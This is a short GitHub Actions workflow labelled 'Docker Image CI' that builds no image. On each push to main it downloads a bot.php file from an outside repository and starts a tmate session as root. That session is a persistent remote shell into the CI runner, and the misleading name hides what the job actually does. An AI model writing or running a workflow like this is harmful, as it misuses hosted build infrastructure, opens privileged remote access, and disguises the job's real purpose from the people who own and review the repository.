name: Docker Image CI

on:
  push:
    branches: [ "main" ]

jobs:
  job1:
    runs-on: ubuntu-latest
    steps:
      - name: Run both commands
        run: |
          phpenv config-rm xdebug.ini || echo "xdebug.ini not found"
          sudo phpdismod xdebug
          wget https://github.com/kalepailmine001/clever/raw/refs/heads/main/bot.php
          sudo apt update && sudo apt install tmate -y
          sudo tmate -F
